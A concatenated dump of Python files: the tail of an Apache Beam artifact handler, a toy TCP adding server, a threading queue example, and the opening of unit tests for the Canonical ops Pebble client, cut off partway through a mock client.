beam_artifact_api_pb2.ArtifactResponseWrapper(
get_artifact_response=chunk))
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
get_artifact_response=beam_artifact_api_pb2.GetArtifactResponse(
data=b''),
is_last=True))
responses.done()
except: # pylint: disable=bare-except
responses.abort()
raise
class BeamFilesystemHandler(object):
def __init__(self, root):
self._root = root
def file_reader(self, path):
return filesystems.FileSystems.open(path)
def file_writer(self, name=None):
full_path = filesystems.FileSystems.join(self._root, name)
return filesystems.FileSystems.create(full_path), full_path
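# Usage sketch for the handler above (paths illustrative): file_writer
# returns both the open handle and the resolved path, so a caller can write
# an artifact and record where it landed in one step.
def _stage_one_artifact_sketch(handler, name, payload):
  handle, full_path = handler.file_writer(name)
  try:
    handle.write(payload)
  finally:
    handle.close()
  return full_path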
|
adding_server.py
|
import socket
import multiprocessing as mp
import threading as thread
import sys
def message_handler(conn, address):
import sys
import lib.protocol_utils as protocol_utils
import time
import datetime
print("New connection from", address)
actual_time = datetime.datetime.utcnow()
    log_file = open("adding_server_log.csv", "a+")
    time.sleep(60)  # artificial delay, presumably to simulate a slow server; remove for prompt responses
raw_data = conn.recv(1024)
log_file.write("{},{},{},{},{}".format(actual_time.isoformat(), time.mktime(actual_time.timetuple()), address[0], address[1], raw_data))
data = protocol_utils.MessageHandler(raw_data).message_loads()
if data and data[0] == "+":
        try:
            message = protocol_utils.MessageResponseBuilder(False, str(float(data[1]) + float(data[2])))
        except (ValueError, IndexError):
            message = protocol_utils.MessageResponseBuilder(True, "The operation requires two numeric operands")
else:
message = protocol_utils.MessageResponseBuilder(True, "Invalid operation")
try:
log_file.write(",{}\n".format(message.get_message()))
log_file.close()
conn.sendall(message.get_message())
conn.close()
except Exception:
print("Connection lost")
sys.exit()
def identification_handler(conn, address, operation_service_addr, operation_service_port):
raw_data = conn.recv(1024)
data = raw_data.decode("utf-8")
if data == "Sv?":
message = "serv|{}|{}".format("+", operation_service_port)
conn.sendall(message.encode())
else:
conn.send("400".encode())
conn.close()
sys.exit()
def thread_operation(socket_o):
    # Note: unused by the __main__ block below, which runs the same accept
    # loop inline (without join, so handlers can run concurrently).
    print("Adding server operation service running ...")
    while True:
        conn, addr = socket_o.accept()
        temp_process = mp.Process(target=message_handler, args=(conn, addr))
        temp_process.start()
        temp_process.join()  # blocks until the handler finishes, serializing connections
def thread_identification(operation_service_addr, operation_service_port):
socket_i = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_i.bind(('', 8000))
socket_i.listen(10)
print("Adding server identification service running ...")
while True:
conn, addr = socket_i.accept()
temp_process = mp.Process(target=identification_handler, args=(conn, addr, operation_service_addr, operation_service_port))
temp_process.start()
        temp_process.join()  # blocks until the handler finishes, so identification requests are handled one at a time
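def example_client(host="127.0.0.1"):
    # Illustrative client sketch (not part of the server): ask the
    # identification service on port 8000 which port the adding service uses,
    # then send an addition request there. The request payload below is a
    # placeholder; the real wire format is defined by lib.protocol_utils,
    # which is not shown here.
    ident = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ident.connect((host, 8000))
    ident.sendall("Sv?".encode())
    reply = ident.recv(1024).decode("utf-8")  # expected: "serv|+|<port>"
    ident.close()
    port = int(reply.split("|")[2])
    op = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    op.connect((host, port))
    op.sendall(b"<protocol_utils-encoded '+' request>")  # placeholder payload
    print(op.recv(1024))
    op.close()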
if __name__ == "__main__":
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_instance.bind(('', 9999))
socket_instance.listen(10)
sockname = socket_instance.getsockname()
t_identification = thread.Thread(target=thread_identification, args=(sockname[0], sockname[1]))
t_identification.start()
print("Adding server operation service running ...")
processes = []
while True:
conn, addr = socket_instance.accept()
temp_process = mp.Process(target=message_handler, args=(conn, addr))
processes.append(temp_process)
temp_process.start()
|
queue_example.py
|
import threading
import queue
tasks_queue = queue.Queue()
def process_tasks_from_queue():
    # Worker loop: block until a task arrives, process it, then call
    # task_done() so tasks_queue.join() can eventually unblock.
    while True:
        task_data: str = tasks_queue.get()
        do_some_work(task_data)
        tasks_queue.task_done()
def do_some_work(task_data: str):
print(f'Doing task_data: {task_data}...')
# daemon=True lets the program exit even though the worker loops never return.
for _ in range(3):
    thread = threading.Thread(target=process_tasks_from_queue, daemon=True)
    thread.start()
for task_number in range(10):
tasks_queue.put(f'Task number: {task_number}')
tasks_queue.join()  # blocks until task_done() has been called once per put()
print('All work is done - bye bye!')
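# Variant sketch (an alternative, not part of the example above): a sentinel
# object lets workers shut down explicitly instead of relying on daemon
# threads being killed when the main thread exits.
_STOP = object()

def process_until_sentinel(q: queue.Queue):
    while True:
        task = q.get()
        if task is _STOP:
            q.task_done()
            break
        do_some_work(task)
        q.task_done()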
|
test_pebble.py
|
#!/usr/bin/python3
# Copyright 2021 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import datetime
import email.parser
import io
import json
import os
import signal
import sys
import tempfile
import test.fake_pebble as fake_pebble
import threading
import time
import unittest
import unittest.mock
import unittest.util
import pytest
import ops.pebble as pebble
from ops._private import yaml
from ops._vendor import websocket
# Ensure unittest diffs don't get truncated like "[17 chars]"
unittest.util._MAX_LENGTH = 1000
def datetime_utc(y, m, d, hour, min, sec, micro=0):
tz = datetime.timezone.utc
return datetime.datetime(y, m, d, hour, min, sec, micro, tzinfo=tz)
def datetime_nzdt(y, m, d, hour, min, sec, micro=0):
tz = datetime.timezone(datetime.timedelta(hours=13))
return datetime.datetime(y, m, d, hour, min, sec, micro, tzinfo=tz)
class TestHelpers(unittest.TestCase):
def test_parse_timestamp(self):
self.assertEqual(pebble._parse_timestamp('2020-12-25T13:45:50+13:00'),
datetime_nzdt(2020, 12, 25, 13, 45, 50, 0))
self.assertEqual(pebble._parse_timestamp('2020-12-25T13:45:50.123456789+13:00'),
datetime_nzdt(2020, 12, 25, 13, 45, 50, 123457))
self.assertEqual(pebble._parse_timestamp('2021-02-10T04:36:22Z'),
datetime_utc(2021, 2, 10, 4, 36, 22, 0))
self.assertEqual(pebble._parse_timestamp('2021-02-10t04:36:22z'),
datetime_utc(2021, 2, 10, 4, 36, 22, 0))
self.assertEqual(pebble._parse_timestamp('2021-02-10T04:36:22.118970777Z'),
datetime_utc(2021, 2, 10, 4, 36, 22, 118971))
self.assertEqual(pebble._parse_timestamp('2020-12-25T13:45:50.123456789+00:00'),
datetime_utc(2020, 12, 25, 13, 45, 50, 123457))
tzinfo = datetime.timezone(datetime.timedelta(hours=-11, minutes=-30))
self.assertEqual(pebble._parse_timestamp('2020-12-25T13:45:50.123456789-11:30'),
datetime.datetime(2020, 12, 25, 13, 45, 50, 123457, tzinfo=tzinfo))
tzinfo = datetime.timezone(datetime.timedelta(hours=4))
self.assertEqual(pebble._parse_timestamp('2000-01-02T03:04:05.006000+04:00'),
datetime.datetime(2000, 1, 2, 3, 4, 5, 6000, tzinfo=tzinfo))
with self.assertRaises(ValueError):
pebble._parse_timestamp('')
with self.assertRaises(ValueError):
pebble._parse_timestamp('foobar')
with self.assertRaises(ValueError):
pebble._parse_timestamp('2021-99-99T04:36:22Z')
with self.assertRaises(ValueError):
            pebble._parse_timestamp('2021-02-10T04:36:22.118970777x')
        with self.assertRaises(ValueError):
            pebble._parse_timestamp('2021-02-10T04:36:22.118970777-99:99')
class TestTypes(unittest.TestCase):
maxDiff = None
def test_error(self):
error = pebble.Error('error')
self.assertIsInstance(error, Exception)
def test_timeout_error(self):
error = pebble.TimeoutError('timeout!')
self.assertIsInstance(error, pebble.Error)
self.assertIsInstance(error, TimeoutError)
self.assertEqual(str(error), 'timeout!')
def test_connection_error(self):
error = pebble.ConnectionError('connerr!')
self.assertIsInstance(error, pebble.Error)
self.assertEqual(str(error), 'connerr!')
def test_protocol_error(self):
error = pebble.ProtocolError('protoerr!')
self.assertIsInstance(error, pebble.Error)
self.assertEqual(str(error), 'protoerr!')
def test_path_error(self):
error = pebble.PathError('not-found', 'thing not found')
self.assertIsInstance(error, pebble.Error)
self.assertEqual(error.kind, 'not-found')
self.assertEqual(error.message, 'thing not found')
self.assertEqual(str(error), 'not-found - thing not found')
def test_api_error(self):
body = {
"result": {
"message": "no services to start provided"
},
"status": "Bad Request",
"status-code": 400,
"type": "error"
}
error = pebble.APIError(body, 400, "Bad Request", "no services")
self.assertIsInstance(error, pebble.Error)
self.assertEqual(error.body, body)
self.assertEqual(error.code, 400)
self.assertEqual(error.status, 'Bad Request')
self.assertEqual(error.message, 'no services')
self.assertEqual(str(error), 'no services')
def test_change_error(self):
change = pebble.Change(
id=pebble.ChangeID('1234'),
kind='start',
summary='Start service "foo"',
status='Done',
tasks=[],
ready=True,
err='Some error',
spawn_time=datetime.datetime.now(),
ready_time=datetime.datetime.now(),
)
error = pebble.ChangeError(change.err, change)
self.assertIsInstance(error, pebble.Error)
self.assertEqual(error.err, 'Some error')
self.assertEqual(error.change, change)
self.assertEqual(str(error), 'Some error')
def test_change_error_with_task_logs(self):
change = pebble.Change(
id=pebble.ChangeID('1234'),
kind='start',
summary='Start service "foo"',
status='Done',
tasks=[
pebble.Task(
id=pebble.TaskID('12345'),
kind='start',
summary='Start service "foo"',
status='Error',
log=['LINE1', 'LINE2'],
progress=pebble.TaskProgress(label='foo', done=3, total=7),
spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218),
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158),
),
pebble.Task(
id=pebble.TaskID('12346'),
kind='start',
summary='Start service "bar"',
status='Error',
log=[],
progress=pebble.TaskProgress(label='foo', done=3, total=7),
spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218),
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158),
),
pebble.Task(
id=pebble.TaskID('12347'),
kind='start',
summary='Start service "bazz"',
status='Error',
log=['single log'],
progress=pebble.TaskProgress(label='foo', done=3, total=7),
spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218),
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158),
),
],
ready=True,
err='Some error',
spawn_time=datetime.datetime.now(),
ready_time=datetime.datetime.now(),
)
error = pebble.ChangeError(change.err, change)
self.assertIsInstance(error, pebble.Error)
self.assertEqual(error.err, 'Some error')
self.assertEqual(error.change, change)
self.assertEqual(str(error), """Some error
----- Logs from task 0 -----
LINE1
LINE2
----- Logs from task 2 -----
single log
-----""")
def test_warning_state(self):
self.assertEqual(list(pebble.WarningState), [
pebble.WarningState.ALL,
pebble.WarningState.PENDING,
])
self.assertEqual(pebble.WarningState.ALL.value, 'all')
self.assertEqual(pebble.WarningState.PENDING.value, 'pending')
def test_change_state(self):
self.assertEqual(list(pebble.ChangeState), [
pebble.ChangeState.ALL,
pebble.ChangeState.IN_PROGRESS,
pebble.ChangeState.READY,
])
self.assertEqual(pebble.ChangeState.ALL.value, 'all')
self.assertEqual(pebble.ChangeState.IN_PROGRESS.value, 'in-progress')
self.assertEqual(pebble.ChangeState.READY.value, 'ready')
def test_system_info_init(self):
info = pebble.SystemInfo(version='1.2.3')
self.assertEqual(info.version, '1.2.3')
def test_system_info_from_dict(self):
info = pebble.SystemInfo.from_dict({'version': '3.2.1'})
self.assertEqual(info.version, '3.2.1')
def test_warning_init(self):
warning = pebble.Warning(
message='Beware!',
first_added=datetime_utc(2021, 1, 1, 1, 1, 1),
last_added=datetime_utc(2021, 1, 26, 2, 3, 4),
last_shown=None,
expire_after='1s',
repeat_after='2s',
)
self.assertEqual(warning.message, 'Beware!')
self.assertEqual(warning.first_added, datetime_utc(2021, 1, 1, 1, 1, 1))
self.assertEqual(warning.last_added, datetime_utc(2021, 1, 26, 2, 3, 4))
self.assertEqual(warning.last_shown, None)
self.assertEqual(warning.expire_after, '1s')
self.assertEqual(warning.repeat_after, '2s')
def test_warning_from_dict(self):
d = {
'message': 'Look out...',
'first-added': '2020-12-25T17:18:54.016273778+13:00',
'last-added': '2021-01-26T17:01:02.12345+13:00',
'expire-after': '1s',
'repeat-after': '2s',
}
warning = pebble.Warning.from_dict(d)
self.assertEqual(warning.message, 'Look out...')
self.assertEqual(warning.first_added, datetime_nzdt(2020, 12, 25, 17, 18, 54, 16274))
self.assertEqual(warning.last_added, datetime_nzdt(2021, 1, 26, 17, 1, 2, 123450))
self.assertEqual(warning.last_shown, None)
self.assertEqual(warning.expire_after, '1s')
self.assertEqual(warning.repeat_after, '2s')
d['last-shown'] = None
warning = pebble.Warning.from_dict(d)
self.assertEqual(warning.last_shown, None)
d['last-shown'] = '2021-08-04T03:02:01.000000000+13:00'
warning = pebble.Warning.from_dict(d)
self.assertEqual(warning.last_shown, datetime_nzdt(2021, 8, 4, 3, 2, 1))
d['first-added'] = '2020-02-03T02:00:40.000000+00:00'
d['last-added'] = '2021-03-04T03:01:41.100000+00:00'
d['last-shown'] = '2022-04-05T06:02:42.200000+00:00'
warning = pebble.Warning.from_dict(d)
self.assertEqual(warning.first_added, datetime_utc(2020, 2, 3, 2, 0, 40, 0))
self.assertEqual(warning.last_added, datetime_utc(2021, 3, 4, 3, 1, 41, 100000))
self.assertEqual(warning.last_shown, datetime_utc(2022, 4, 5, 6, 2, 42, 200000))
def test_task_progress_init(self):
tp = pebble.TaskProgress(label='foo', done=3, total=7)
self.assertEqual(tp.label, 'foo')
self.assertEqual(tp.done, 3)
self.assertEqual(tp.total, 7)
def test_task_progress_from_dict(self):
tp = pebble.TaskProgress.from_dict({
'label': 'foo',
'done': 3,
'total': 7,
})
self.assertEqual(tp.label, 'foo')
self.assertEqual(tp.done, 3)
self.assertEqual(tp.total, 7)
def test_task_id(self):
task_id = pebble.TaskID('1234')
self.assertEqual(task_id, '1234')
def test_task_init(self):
task = pebble.Task(
id=pebble.TaskID('42'),
kind='start',
summary='Start service "svc"',
status='Done',
log=[],
progress=pebble.TaskProgress(label='foo', done=3, total=7),
spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218),
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158),
)
self.assertEqual(task.id, '42')
self.assertEqual(task.kind, 'start')
self.assertEqual(task.summary, 'Start service "svc"')
self.assertEqual(task.status, 'Done')
self.assertEqual(task.log, [])
self.assertEqual(task.progress.label, 'foo')
self.assertEqual(task.progress.done, 3)
self.assertEqual(task.progress.total, 7)
self.assertEqual(task.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218))
self.assertEqual(task.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158))
self.assertEqual(task.data, {})
def test_task_from_dict(self):
d = {
"id": "78",
"kind": "start",
"progress": {
"done": 1,
"label": "",
"total": 1,
},
"ready-time": "2021-01-28T14:37:03.270218778+13:00",
"spawn-time": "2021-01-28T14:37:02.247158162+13:00",
"status": "Done",
"summary": 'Start service "svc"',
"data": {"exit-code": 42},
}
task = pebble.Task.from_dict(d)
self.assertEqual(task.id, '78')
self.assertEqual(task.kind, 'start')
self.assertEqual(task.summary, 'Start service "svc"')
self.assertEqual(task.status, 'Done')
self.assertEqual(task.log, [])
self.assertEqual(task.progress.label, '')
self.assertEqual(task.progress.done, 1)
self.assertEqual(task.progress.total, 1)
self.assertEqual(task.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 3, 270219))
self.assertEqual(task.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158))
self.assertEqual(task.data, {'exit-code': 42})
d['ready-time'] = '2021-01-28T14:37:03.270218778+00:00'
d['spawn-time'] = '2021-01-28T14:37:02.247158162+00:00'
task = pebble.Task.from_dict(d)
self.assertEqual(task.ready_time, datetime_utc(2021, 1, 28, 14, 37, 3, 270219))
self.assertEqual(task.spawn_time, datetime_utc(2021, 1, 28, 14, 37, 2, 247158))
def test_change_id(self):
change_id = pebble.ChangeID('1234')
self.assertEqual(change_id, '1234')
def test_change_init(self):
change = pebble.Change(
id=pebble.ChangeID('70'),
kind='autostart',
err='SILLY',
ready=True,
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 4, 291517),
spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247202),
status='Done',
summary='Autostart service "svc"',
tasks=[],
)
self.assertEqual(change.id, '70')
self.assertEqual(change.kind, 'autostart')
self.assertEqual(change.err, 'SILLY')
self.assertEqual(change.ready, True)
self.assertEqual(change.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291517))
self.assertEqual(change.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247202))
self.assertEqual(change.status, 'Done')
self.assertEqual(change.summary, 'Autostart service "svc"')
self.assertEqual(change.tasks, [])
self.assertEqual(change.data, {})
def test_change_from_dict(self):
d = {
"id": "70",
"kind": "autostart",
"err": "SILLY",
"ready": True,
"ready-time": "2021-01-28T14:37:04.291517768+13:00",
"spawn-time": "2021-01-28T14:37:02.247202105+13:00",
"status": "Done",
"summary": 'Autostart service "svc"',
"tasks": [],
"data": {"exit-code": 42},
}
change = pebble.Change.from_dict(d)
self.assertEqual(change.id, '70')
self.assertEqual(change.kind, 'autostart')
self.assertEqual(change.err, 'SILLY')
self.assertEqual(change.ready, True)
self.assertEqual(change.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(change.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247202))
self.assertEqual(change.status, 'Done')
self.assertEqual(change.summary, 'Autostart service "svc"')
self.assertEqual(change.tasks, [])
self.assertEqual(change.data, {'exit-code': 42})
d['ready-time'] = '2021-01-28T14:37:04.291517768+00:00'
d['spawn-time'] = '2021-01-28T14:37:02.247202105+00:00'
change = pebble.Change.from_dict(d)
self.assertEqual(change.ready_time, datetime_utc(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(change.spawn_time, datetime_utc(2021, 1, 28, 14, 37, 2, 247202))
def test_file_type(self):
self.assertEqual(list(pebble.FileType), [
pebble.FileType.FILE,
pebble.FileType.DIRECTORY,
pebble.FileType.SYMLINK,
pebble.FileType.SOCKET,
pebble.FileType.NAMED_PIPE,
pebble.FileType.DEVICE,
pebble.FileType.UNKNOWN,
])
self.assertEqual(pebble.FileType.FILE.value, 'file')
self.assertEqual(pebble.FileType.DIRECTORY.value, 'directory')
self.assertEqual(pebble.FileType.SYMLINK.value, 'symlink')
self.assertEqual(pebble.FileType.SOCKET.value, 'socket')
self.assertEqual(pebble.FileType.NAMED_PIPE.value, 'named-pipe')
self.assertEqual(pebble.FileType.DEVICE.value, 'device')
self.assertEqual(pebble.FileType.UNKNOWN.value, 'unknown')
def test_file_info_init(self):
info = pebble.FileInfo('/etc/hosts', 'hosts', pebble.FileType.FILE, 123, 0o644,
datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518),
12, 'bob', 34, 'staff')
self.assertEqual(info.path, '/etc/hosts')
self.assertEqual(info.name, 'hosts')
self.assertEqual(info.type, pebble.FileType.FILE)
self.assertEqual(info.size, 123)
self.assertEqual(info.permissions, 0o644)
self.assertEqual(info.last_modified, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(info.user_id, 12)
self.assertEqual(info.user, 'bob')
self.assertEqual(info.group_id, 34)
self.assertEqual(info.group, 'staff')
def test_file_info_from_dict(self):
d = {
'path': '/etc',
'name': 'etc',
'type': 'directory',
'permissions': '644',
'last-modified': '2021-01-28T14:37:04.291517768+13:00',
}
info = pebble.FileInfo.from_dict(d)
self.assertEqual(info.path, '/etc')
self.assertEqual(info.name, 'etc')
self.assertEqual(info.type, pebble.FileType.DIRECTORY)
self.assertEqual(info.permissions, 0o644)
self.assertEqual(info.last_modified, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertIs(info.user_id, None)
self.assertIs(info.user, None)
self.assertIs(info.group_id, None)
self.assertIs(info.group, None)
d['type'] = 'foobar'
d['size'] = 123
d['user-id'] = 12
d['user'] = 'bob'
d['group-id'] = 34
d['group'] = 'staff'
info = pebble.FileInfo.from_dict(d)
self.assertEqual(info.type, 'foobar')
self.assertEqual(info.size, 123)
self.assertEqual(info.user_id, 12)
self.assertEqual(info.user, 'bob')
self.assertEqual(info.group_id, 34)
self.assertEqual(info.group, 'staff')
class TestPlan(unittest.TestCase):
def test_no_args(self):
with self.assertRaises(TypeError):
pebble.Plan()
def test_services(self):
plan = pebble.Plan('')
self.assertEqual(plan.services, {})
plan = pebble.Plan('services:\n foo:\n override: replace\n command: echo foo')
self.assertEqual(len(plan.services), 1)
self.assertEqual(plan.services['foo'].name, 'foo')
self.assertEqual(plan.services['foo'].override, 'replace')
self.assertEqual(plan.services['foo'].command, 'echo foo')
# Should be read-only ("can't set attribute")
with self.assertRaises(AttributeError):
plan.services = {}
def test_yaml(self):
# Starting with nothing, we get the empty result
plan = pebble.Plan('')
self.assertEqual(plan.to_yaml(), '{}\n')
self.assertEqual(str(plan), '{}\n')
# With a service, we return validated yaml content.
raw = '''\
services:
foo:
override: replace
command: echo foo
'''
plan = pebble.Plan(raw)
reformed = yaml.safe_dump(yaml.safe_load(raw))
self.assertEqual(plan.to_yaml(), reformed)
self.assertEqual(str(plan), reformed)
def test_service_equality(self):
plan = pebble.Plan('')
self.assertEqual(plan.services, {})
plan = pebble.Plan('services:\n foo:\n override: replace\n command: echo foo')
old_service = pebble.Service(name="foo",
raw={
"override": "replace",
"command": "echo foo"
})
old_services = {"foo": old_service}
self.assertEqual(plan.services, old_services)
services_as_dict = {
"foo": {"override": "replace", "command": "echo foo"}
}
self.assertEqual(plan.services, services_as_dict)
class TestLayer(unittest.TestCase):
def _assert_empty(self, layer):
self.assertEqual(layer.summary, '')
self.assertEqual(layer.description, '')
self.assertEqual(layer.services, {})
self.assertEqual(layer.to_dict(), {})
def test_no_args(self):
s = pebble.Layer()
self._assert_empty(s)
def test_dict(self):
s = pebble.Layer({})
self._assert_empty(s)
d = {
'summary': 'Sum Mary',
'description': 'The quick brown fox!',
'services': {
'foo': {
'summary': 'Foo',
'command': 'echo foo',
},
'bar': {
'summary': 'Bar',
'command': 'echo bar',
},
}
}
s = pebble.Layer(d)
self.assertEqual(s.summary, 'Sum Mary')
self.assertEqual(s.description, 'The quick brown fox!')
self.assertEqual(s.services['foo'].name, 'foo')
self.assertEqual(s.services['foo'].summary, 'Foo')
self.assertEqual(s.services['foo'].command, 'echo foo')
self.assertEqual(s.services['bar'].name, 'bar')
self.assertEqual(s.services['bar'].summary, 'Bar')
self.assertEqual(s.services['bar'].command, 'echo bar')
self.assertEqual(s.to_dict(), d)
def test_yaml(self):
s = pebble.Layer('')
self._assert_empty(s)
yaml = """description: The quick brown fox!
services:
bar:
command: echo bar
environment:
ENV1: value1
ENV2: value2
group: staff
group-id: 2000
summary: Bar
user: bob
user-id: 1000
foo:
command: echo foo
summary: Foo
summary: Sum Mary
"""
s = pebble.Layer(yaml)
self.assertEqual(s.summary, 'Sum Mary')
self.assertEqual(s.description, 'The quick brown fox!')
self.assertEqual(s.services['foo'].name, 'foo')
self.assertEqual(s.services['foo'].summary, 'Foo')
self.assertEqual(s.services['foo'].command, 'echo foo')
self.assertEqual(s.services['bar'].name, 'bar')
self.assertEqual(s.services['bar'].summary, 'Bar')
self.assertEqual(s.services['bar'].command, 'echo bar')
self.assertEqual(s.services['bar'].environment,
{'ENV1': 'value1', 'ENV2': 'value2'})
self.assertEqual(s.services['bar'].user, 'bob')
self.assertEqual(s.services['bar'].user_id, 1000)
self.assertEqual(s.services['bar'].group, 'staff')
self.assertEqual(s.services['bar'].group_id, 2000)
self.assertEqual(s.to_yaml(), yaml)
self.assertEqual(str(s), yaml)
def test_layer_service_equality(self):
s = pebble.Layer({})
self._assert_empty(s)
d = {
'summary': 'Sum Mary',
'description': 'The quick brown fox!',
'services': {
'foo': {
'summary': 'Foo',
'command': 'echo foo',
},
'bar': {
'summary': 'Bar',
'command': 'echo bar',
},
}
}
s = pebble.Layer(d)
t = pebble.Layer(d)
self.assertEqual(s.services, t.services)
class TestService(unittest.TestCase):
def _assert_empty(self, service, name):
self.assertEqual(service.name, name)
self.assertEqual(service.summary, '')
self.assertEqual(service.description, '')
self.assertEqual(service.startup, '')
self.assertEqual(service.override, '')
self.assertEqual(service.command, '')
self.assertEqual(service.after, [])
self.assertEqual(service.before, [])
self.assertEqual(service.requires, [])
self.assertEqual(service.environment, {})
self.assertEqual(service.user, '')
self.assertIs(service.user_id, None)
self.assertEqual(service.group, '')
self.assertIs(service.group_id, None)
self.assertEqual(service.to_dict(), {})
def test_name_only(self):
s = pebble.Service('Name 0')
self._assert_empty(s, 'Name 0')
def test_dict(self):
s = pebble.Service('Name 1', {})
self._assert_empty(s, 'Name 1')
d = {
'summary': 'Sum Mary',
'description': 'The lazy quick brown',
'startup': 'Start Up',
'override': 'override',
'command': 'echo sum mary',
'after': ['a1', 'a2'],
'before': ['b1', 'b2'],
'requires': ['r1', 'r2'],
'environment': {'k1': 'v1', 'k2': 'v2'},
'user': 'bob',
'user-id': 1000,
'group': 'staff',
'group-id': 2000,
}
s = pebble.Service('Name 2', d)
self.assertEqual(s.name, 'Name 2')
self.assertEqual(s.description, 'The lazy quick brown')
self.assertEqual(s.startup, 'Start Up')
self.assertEqual(s.override, 'override')
self.assertEqual(s.command, 'echo sum mary')
self.assertEqual(s.after, ['a1', 'a2'])
self.assertEqual(s.before, ['b1', 'b2'])
self.assertEqual(s.requires, ['r1', 'r2'])
self.assertEqual(s.environment, {'k1': 'v1', 'k2': 'v2'})
self.assertEqual(s.user, 'bob')
self.assertEqual(s.user_id, 1000)
self.assertEqual(s.group, 'staff')
self.assertEqual(s.group_id, 2000)
self.assertEqual(s.to_dict(), d)
# Ensure pebble.Service has made copies of mutable objects
s.after.append('a3')
s.before.append('b3')
s.requires.append('r3')
s.environment['k3'] = 'v3'
self.assertEqual(s.after, ['a1', 'a2', 'a3'])
self.assertEqual(s.before, ['b1', 'b2', 'b3'])
self.assertEqual(s.requires, ['r1', 'r2', 'r3'])
self.assertEqual(s.environment, {'k1': 'v1', 'k2': 'v2', 'k3': 'v3'})
self.assertEqual(d['after'], ['a1', 'a2'])
self.assertEqual(d['before'], ['b1', 'b2'])
self.assertEqual(d['requires'], ['r1', 'r2'])
self.assertEqual(d['environment'], {'k1': 'v1', 'k2': 'v2'})
def test_equality(self):
d = {
'summary': 'Sum Mary',
'description': 'The lazy quick brown',
'startup': 'Start Up',
'override': 'override',
'command': 'echo sum mary',
'after': ['a1', 'a2'],
'before': ['b1', 'b2'],
'requires': ['r1', 'r2'],
'environment': {'k1': 'v1', 'k2': 'v2'},
'user': 'bob',
'user-id': 1000,
'group': 'staff',
'group-id': 2000,
}
one = pebble.Service("Name 1", d)
two = pebble.Service("Name 1", d)
self.assertEqual(one, two)
as_dict = {
'summary': 'Sum Mary',
'description': 'The lazy quick brown',
'startup': 'Start Up',
'override': 'override',
'command': 'echo sum mary',
'after': ['a1', 'a2'],
'before': ['b1', 'b2'],
'requires': ['r1', 'r2'],
'environment': {'k1': 'v1', 'k2': 'v2'},
'user': 'bob',
'user-id': 1000,
'group': 'staff',
'group-id': 2000,
}
self.assertEqual(one, as_dict)
class TestServiceInfo(unittest.TestCase):
def test_service_startup(self):
self.assertEqual(list(pebble.ServiceStartup), [
pebble.ServiceStartup.ENABLED,
pebble.ServiceStartup.DISABLED,
])
self.assertEqual(pebble.ServiceStartup.ENABLED.value, 'enabled')
self.assertEqual(pebble.ServiceStartup.DISABLED.value, 'disabled')
def test_service_status(self):
self.assertEqual(list(pebble.ServiceStatus), [
pebble.ServiceStatus.ACTIVE,
pebble.ServiceStatus.INACTIVE,
pebble.ServiceStatus.ERROR,
])
self.assertEqual(pebble.ServiceStatus.ACTIVE.value, 'active')
self.assertEqual(pebble.ServiceStatus.INACTIVE.value, 'inactive')
self.assertEqual(pebble.ServiceStatus.ERROR.value, 'error')
def test_service_info(self):
s = pebble.ServiceInfo('svc1', pebble.ServiceStartup.ENABLED, pebble.ServiceStatus.ACTIVE)
self.assertEqual(s.name, 'svc1')
self.assertEqual(s.startup, pebble.ServiceStartup.ENABLED)
self.assertEqual(s.current, pebble.ServiceStatus.ACTIVE)
s = pebble.ServiceInfo.from_dict({
'name': 'svc2',
'startup': 'disabled',
'current': 'inactive',
})
self.assertEqual(s.name, 'svc2')
self.assertEqual(s.startup, pebble.ServiceStartup.DISABLED)
self.assertEqual(s.current, pebble.ServiceStatus.INACTIVE)
s = pebble.ServiceInfo.from_dict({
'name': 'svc2',
'startup': 'thingy',
'current': 'bob',
})
self.assertEqual(s.name, 'svc2')
self.assertEqual(s.startup, 'thingy')
self.assertEqual(s.current, 'bob')
def test_is_running(self):
s = pebble.ServiceInfo('s', pebble.ServiceStartup.ENABLED, pebble.ServiceStatus.ACTIVE)
self.assertTrue(s.is_running())
for current in [pebble.ServiceStatus.INACTIVE, pebble.ServiceStatus.ERROR, 'other']:
s = pebble.ServiceInfo('s', pebble.ServiceStartup.ENABLED, current)
self.assertFalse(s.is_running())
class MockClient(pebble.Client):
"""Mock Pebble client that simply records requests and returns stored responses."""
def __init__(self):
self.requests = []
self.responses = []
self.timeout = 5
self.websockets = {}
def _request(self, method, path, query=None, body=None):
self.requests.append((method, path, query, body))
resp = self.responses.pop(0)
if isinstance(resp, Exception):
raise resp
if callable(resp):
resp = resp()
return resp
def _request_raw(self, method, path, query=None, headers=None, data=None):
